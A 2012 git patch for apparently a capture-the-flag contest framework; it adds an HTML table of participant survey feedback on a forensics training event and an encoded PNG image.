From d9276c9a18769660bc806b93738a83a3d5331e27 Mon Sep 17 00:00:00 2001 From: Neale Pickett Date: Sun, 22 Jul 2012 17:14:06 -0600 Subject: [PATCH 1/8] Move away from /var --- doc/2011-03-TF3/survey-results.html | 328 +++++++++++++++++ doc/2011-09-Inferno/inferno.png | Bin 0 -> 76924 bytes doc/ref.txt | 14 +- doc/tokens.txt | 10 +- packages/00common/service/pointsd/mkpage | 4 +- packages/00common/service/pointsd/pointsd | 12 +- packages/00common/service/pointsd/run | 21 +- packages/00common/service/sshd/run | 2 +- packages/00common/src/common.c | 14 +- packages/00common/src/puzzles.cgi.c | 4 +- packages/cowbull/service/cowbull/run | 2 +- packages/cowbull/src/cowcli_vand.c | 355 +++++++++++++++++++ packages/fizzbuzz/service/fizzbuzz/go | 2 +- packages/inferno/service/httpd/run | 4 +- packages/ircd/service/ircd/run | 2 +- packages/mcp/bin/addteam | 20 +- packages/mcp/bin/new-contest | 18 +- packages/mcp/bin/run-ctf | 14 +- packages/mcp/bin/scoreboard | 7 +- packages/mcp/bin/teams.sh | 38 -- packages/mcp/service/httpd/run | 9 +- packages/mcp/www/register.cgi | 4 +- packages/multicaster/service/multicaster/run | 2 +- packages/octopus/service/octopus/run | 2 +- packages/p2/bin/p2console | 7 +- packages/p2/service/httpd/run | 21 +- packages/p2/www/credits.html | 51 --- packages/p2/www/index.html | 8 +- packages/p2/www/news.html | 17 + packages/p2client/service/p2client/run | 4 +- packages/playfair/service/playfair/run | 2 +- packages/printf/service/printf/run-printf | 2 +- packages/revwords/service/revwords/go | 2 +- packages/rlyeh/service/rlyeh/rlyeh-ctf | 10 +- packages/router/service/radvd/run | 2 +- packages/router/service/router/run | 2 +- packages/tanks/html/designer.cgi | 4 +- packages/tanks/html/newest.html | 30 ++ packages/tanks/service/tanksd/run | 15 +- packages/tanks/service/tanksd/tanksd | 46 ++- 40 files changed, 880 insertions(+), 231 deletions(-) create mode 100644 doc/2011-03-TF3/survey-results.html create mode 100644 doc/2011-09-Inferno/inferno.png create mode 100644 packages/cowbull/src/cowcli_vand.c delete mode 100755 packages/mcp/bin/teams.sh delete mode 100644 packages/p2/www/credits.html create mode 100644 packages/p2/www/news.html create mode 100644 packages/tanks/html/newest.html diff --git a/doc/2011-03-TF3/survey-results.html b/doc/2011-03-TF3/survey-results.html new file mode 100644 index 0000000..b80a47d --- /dev/null +++ b/doc/2011-03-TF3/survey-results.html @@ -0,0 +1,328 @@ + +Survey results + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Classinstructorclassroomclass-contentcontest-setupcontest-ambiancecontest-networkcontest-lanlcontest-sandiacontest-vendorshotelComments
net★★★ ★★★ ★★★ ★★★ ★★★ ★★★ ★★★ ★★★ ★★★ ★★★
net★★★ ★★ ★★ Useful techniques, but no practical training on how to identify what data should be flagged for deeper analysis (e.g. how do you find the data that you will then try to crack)★★ ★★ ★★ ★★ None ★★★ Solera was actually practical as it walked you through part of an investigation★★ albuquerque would be more convenientIt would be nice to take a more practical approach to the training and exercise. E.g. Here are some things you would do to identify areas of concern and then go into the investigation of the data. Exercises could be less "random" and tied together better.
host★★★ Everyone was awesome. Great job guys! ★★ If you were in the back of the room the board was little hard to see.★★★ ★★★ ★★★ ★★ ★★ The challenges were tough. However, the answer server could use some improvement in the way it accepts answers, or make it more clear what format it needs to be in. A lot of time was spent trying to enter the answer in the right syntax after we got it. ★★★ ★★★ ★★ The food was good. The rooms were a tad small.Overall the conference was very good.
net★ 1% instruction, more of a sink or swim- Here ya go. I thought this was a training course.★★ ★ There wasn't much teaching. Seemed to be a exercise of what you already knew. Signed up to learn. Moved to Malware RE the second day were they were teaching.★★ Would be better with some elbow room. 7 laptops and a desktop on a small round table doesn't work so well.★★★ Just loud enough, Chairs were uncomfortable★★★ ★★ Would have better to have a true capture the flag instead of puzzles. Maybe each team gets a server and must protect and attack others.★★ ★★ ★★★
★★ too many to give an accurate judgement. some good, some so-so★★ worked well. Noisy AC hurt hearing at time. ★★ Slides were way to crowded and ahrd to read. If you were not familiar with the tools, the fast clicking through windows hurt.★★★ ★★ understanding the voince from beyond over the music was difficult. Probably fine of you live in a leet underworld and are used to the accent.★★★ None forensics puzzles needed to be replaced. Answers needed verificaion and format specified.
None Limiting it to 1 thing being worked on at a time for the group was a bad design. Loosing points as others attempt to work on other pieces.★★ Finding your way through solera would be easier if it was commonly used. Attempting to find what they anted through a gui is much more difficult that what I normally do vai dumping pcap.★★ A strange but interesting place. needed increaed water pressure if you want a hot shower.With the forensics puzzles, having the same for the classroom vs the contest helped those that took close notes. There is way too much use of Encase and limits on how far yoyu can get if you are unfamiliar with it.
net★ 1% instruction, more of a sink or swim- Here ya go. I thought this was a training course.★★ ★ There wasn't much teaching. Seemed to be a exercise of what you already knew. Signed up to learn. Moved to Malware RE the second day were they were teaching.★★ Would be better with some elbow room. 7 laptops and a desktop on a small round table doesn't work so well.★★★ Just loud enough, Chairs were uncomfortable★★★ ★★ Would have better to have a true capture the flag instead of puzzles. Maybe each team gets a server and must protect and attack others.★★ ★★ ★★★
host★★★ ★★ ★★★ ★★ ★★★ ★★ ★★★ ★★★ ★★ ★★ Please... somewhere with faster, more reliable internet next year.
host★★★ ★★ ★★★ ★★ ★★★ ★★ ★★★ ★★★ ★★ ★★ Please... somewhere with faster, more reliable internet next year.
host★★★ ★★ ★★★ ★★ ★★★ ★★ ★★★ ★★★ ★★ ★★ Please... somewhere with faster, more reliable internet next year.
net★★ ★★ ★★★ If students should use python3, then all the examples should be in python3★★★ ★★ ★★★ ★★★ ★★★ ★★ ★★★
noneNone Didn't attendNone Didn't attendNone Didn't attend★★★ ★★★ ★★★ ★★★ None Didn't focus on itNone Didn't focus on it★★★ More stuff like WOPR / octopus / pwnables / printf!
host★★ The portions of the instruction that were lecture only could have been improved by having students follow along and actually participate. For example, instead of teaching Windows Registry purely by lecture, have students open Regex or examine the Registry using EnCase.★★★ Good facilities and connections. No complaints.★★★ Aside from the pure lecture portions, the content was good. Exactly what I expected when signing up for a forensics course. Good that not a lot of time was devoted to teaching the basics of the programs, like EnCase.★★★ Good facilities and connections. No complaints.★★ Would it kill you to play a little Smokey Robinson? ;)★★★ No complaints.★★★ Awesome puzzles and contests. So much to keep everyone busy. Maybe a little too much material for smaller teams to even make a dent in scoring points. My only complaint is the way in which answers are required to be formatted. See the General Comments section for more detail.★★ I didn't really participate much in the Sandia Jeopardy business. From what I saw, it looked good.★★★ Good way to show off their products without it being just a sales pitch. The puzzles they provided were great.★★★ Nice. No complaints.Participants should not have to decipher the format of the answer for the questions on their own. Dates/times entries either need to be in a precise, specified format or the system should be able to taken input and determine whether or not the correct answer is known. Whether or not an answer is correct should be determined by upper or lower case letters. The scoring systems should be able to compare the data submitted and normalize the input and compare it to the correct answer.
net★★ ★★★ ★★★ ★★★ ★★ Not a fan of house music, other than that it was great★ serious issues, I do not know what to tell you about how to fix it but it was "spotty" at best★★ more HINTS for newbs★★ Good, but got complicated with the NAS and the storage and the file management and stuff, that could be implemented better★★★ The fireeye got hard fast, which means I did not finish, but it also means that their system didn't get totally utilized right?★★★ the laFonda was pretty awesome actuallyI hope eI get to keep coming to these, this has been a great culmination of the first few years of my experience as a cyber analyst and it was great to see that I am indeed actually learning something.
None None None None None None None None None None
net★★★ ★★ ★★★ ★★★ ★★★ ★★★ ★★★ ★★★ ★★★ ★★★ This is really great material and the puzzles are very well presented. The entire exercise is extremely well organized. + +This lacking was my background knowledge. + +Next time I am going to be a lot more prepared for the challenges. + +This was my first ever Capture the flag and participation in a exercise like this but you certainly have found a permanent participant. + +A+++++ will do it again. + +Tracerfire starts from where all the text books ends. +
noneNone Did not attend the classNone Did not attend the classNone Did not attend the class★★★ ★★ Music was a little loud and repetitive (it's techno!)★★★ ★★★ Learned tons!None Did not play these ones★★★ Solera was interestingNone Did not use the hotelFirst time at a capture the flag competition. Learned a lot!
★★★ The Dr was good★★ seats sucked★★★ good stuff★★ tables, eh. room ok★★ purdy good★★ worky most of the time★★ ★★ ★ Solera example was weak★★ bar good. room ok.Thanks for the hard work! A little more intro to the contest and expectations for the n00bs would be good....
net★★ Not enough instructing. Mostly just "here's puzzles' solve them.★★ ★★★ Good material to learn on; just need more teaching, and more response to questions.★★ ★★ ★ Terrible. I often had to reload a dozen times to submit a solution. Also, being unable to reach the internet made this very frustrating and much less fun.★★★ Great material. Wish we had been introduced better to actually doing things; most categories my team had no idea how to even begin on, and contest time was not an environment that allowed us to learn in.None None None The contest material was really good, but nobody on my team knew how to approach (or even find!) most of it. Maybe this would be fixed by better team distribution, but it would be likely that someone skilled would just take over, instead of teaching other people. Thus, I ended up feeling really frustrated that I wasn't actually learning anything, and just feeling punished for the things I didn't know or couldn't do (which was most of the contest).
net★★ Paul clearly knows his stuff; however, his explanations weren't always clear.★★ difficult to see the few onscreen examples★★ it wasn't lame, but didn't find the info useful for the challenge days. :(★★ room was fine. tables were a bit small. Really like the provided forensic workstations with pre-loaded tools.★★ light was better than last year's event. Music wasn't great on day 1, "felt the rhythm" on day 2.★★★ awesome★★ overall good. some stuff was just unrealistic★★ overall good. some stuff was just unrealistic...and some was just funny!★★ really liked the idea of vendors offering their own challenges! I didn't get to work on them very much though (other team members)★★★ location was great! lots of choices for dinner and lunch downstairs was spot-on every day! the breakfast food was lame though I think Tracer should foster more "forced" interaction--the idea of information sharing is key...beyond the event, within our real jobs. I would like better or just more classroom hours. Maybe a full week of class room and a weekend of challenges would be cool. thanks for all the hard work!
none★★ NA★★ NA★★ NA★★★ ★★★ ★★ ★★★ ★★★ ★★ can't say★★ NA
net★ Come on, we expected some one teach something otherwise all those questions can be found through Internet.★★ ★★ ★★ ★★ ★★★ ★★★ ★★★ ★★★ ★★ I dont think I learn alot
host★★★ ★★ ★★ ★★ Several inconvenient network outages.★★★ ★★ ★★ ★★ ★★★ Fun competition. Could have used more communication among the people who wrote the questions.
host★★ Varied. Not having the slides the first day made following along very difficult.★★ Screens were sometimes hard to see and chairs weren't comfortable.★★ Too Windows and Encase centric to justify another trip.★★ No real issues except the chairs.★★★ No complains here.★★ Didn't have any major issues and Internet access table was very fast.★★ Wasn't really aware there was different content between the sites except for some of the instructors.★★ ★★ Didn't attempt★★ All the shops close at 5pm so there's not much to do except eat and drink. Hotel WiFi was really slow. No vending machines?!Learned some interesting things, met some very interesting people, and got a different perspective on security, but can't justify another trip for myself or a fellow system administrator with the content and exercises used this year.
net★★★ ★★★ ★★★ Problems were hard I learned a lot.★★★ ★★★ ★★★ ★★★ ★★★ ★★★ None The network ran well. problems were hard. thanks for the effort.
malware★★★ ★★ ★★★ ★★ uncomfortable chairs★★ music was a bit too loud★★ better access to internet★★★ first time, so it must be great★★★ see above★★ didn't touch it, so i have no idea★★ did not stay in hotel
+ diff --git a/doc/2011-09-Inferno/inferno.png b/doc/2011-09-Inferno/inferno.png new file mode 100644 index 0000000000000000000000000000000000000000..13c8c5eac1329a2c1522c496be042c057eef0ee0 GIT binary patch literal 76924 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 